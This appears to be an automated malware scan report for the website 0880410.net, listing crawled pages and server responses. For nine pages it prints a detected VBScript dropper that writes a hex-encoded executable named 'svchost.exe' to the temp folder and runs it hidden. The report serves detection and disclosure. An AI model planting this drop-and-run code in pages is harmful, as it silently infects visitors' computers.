Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=0880410.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.0880410.net/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:08 GMT Accept-Ranges: bytes ETag: "f9e128e84defcf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 18418 Content-Location: http://www.0880410.net/index.html Content-Type: text/html Last-Modified: Fri, 24 Oct 2014 05:46:50 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/index.html | 200 OK Content-Length: 18418 Content-Type: text/html | clean |
http://www.0880410.net/skin/tupian/qq.js | 200 OK Content-Length: 4289 Content-Type: application/x-javascript | clean |
http://www.0880410.net/lxwm/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:10 GMT Accept-Ranges: bytes ETag: "4e461657194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121374 Content-Location: http://www.0880410.net/lxwm/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:38:55 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/lxwm/index.html | 200 OK Content-Length: 121374 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/about | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:17 GMT Location: http://www.0880410.net/about/ Server: Microsoft-IIS/6.0 Content-Length: 152 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/about/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:18 GMT Accept-Ranges: bytes ETag: "c0adf8d57094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 122957 Content-Location: http://www.0880410.net/about/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:36 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/about/index.html | 200 OK Content-Length: 122957 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/news | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:22 GMT Location: http://www.0880410.net/news/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/news/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:22 GMT Accept-Ranges: bytes ETag: "1f93c8ab459acf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 489333 Content-Location: http://www.0880410.net/news/index.html Content-Type: text/html Last-Modified: Tue, 08 Jul 2014 00:43:44 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/news/index.html | 200 OK Content-Length: 302152 Content-Type: text/html | clean |
http://www.0880410.net/cpzx | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:27 GMT Location: http://www.0880410.net/cpzx/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/cpzx/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:27 GMT Accept-Ranges: bytes ETag: "6264d9d87094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 125096 Content-Location: http://www.0880410.net/cpzx/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:41 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/cpzx/index.html | 200 OK Content-Length: 125096 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/job | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:31 GMT Location: http://www.0880410.net/job/ Server: Microsoft-IIS/6.0 Content-Length: 150 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/job/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:31 GMT Accept-Ranges: bytes ETag: "ca6efe47194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120571 Content-Location: http://www.0880410.net/job/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:38:55 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/job/index.html | 200 OK Content-Length: 120571 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/lxwm | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:38 GMT Location: http://www.0880410.net/lxwm/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.0880410.net/dlhz | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:38 GMT Location: http://www.0880410.net/dlhz/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/dlhz/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:40 GMT Accept-Ranges: bytes ETag: "781b6df7094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120731 Content-Location: http://www.0880410.net/dlhz/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:51 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/dlhz/index.html | 200 OK Content-Length: 120731 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/fw | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:43 GMT Location: http://www.0880410.net/fw/ Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/fw/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:43 GMT Accept-Ranges: bytes ETag: "a0f9e847194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120864 Content-Location: http://www.0880410.net/fw/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:38:55 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/fw/index.html | 200 OK Content-Length: 120864 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/khal | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 06:31:47 GMT Location: http://www.0880410.net/khal/ Server: Microsoft-IIS/6.0 Content-Length: 151 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.0880410.net/khal/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:47 GMT Accept-Ranges: bytes ETag: "8c5aa57194cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120520 Content-Location: http://www.0880410.net/khal/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:38:55 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/khal/index.html | 200 OK Content-Length: 120520 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/cpzx/c1/s2/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:51 GMT Accept-Ranges: bytes ETag: "adfccd67094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121286 Content-Location: http://www.0880410.net/cpzx/c1/s2/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:37 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/cpzx/c1/s2/index.html | 200 OK Content-Length: 121286 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/cpzx/c1/2/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:54 GMT Accept-Ranges: bytes ETag: "60d31ed67094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121294 Content-Location: http://www.0880410.net/cpzx/c1/2/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:36 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/cpzx/c1/2/index.html | 200 OK Content-Length: 121294 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/cpzx/c1/3/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:31:58 GMT Accept-Ranges: bytes ETag: "46bc68d67094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121800 Content-Location: http://www.0880410.net/cpzx/c1/3/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:37 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/cpzx/c1/3/index.html | 200 OK Content-Length: 121800 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.0880410.net/cpzx/c1/4/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 06:32:01 GMT Accept-Ranges: bytes ETag: "70317ed67094cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121216 Content-Location: http://www.0880410.net/cpzx/c1/4/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 14:37:37 GMT X-Powered-By: ASP.NET | clean |
http://www.0880410.net/cpzx/c1/4/index.html | 200 OK Content-Length: 121216 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 0880410.net
Result:
GET / HTTP/1.1
Host: 0880410.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 0880410.net
Referer: http://www.google.com/search?q=0880410.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 0880410.net
Referer: http://www.google.com/search?q=0880410.net
Result:
The result is similar to the first query. There are no suspicious redirects found.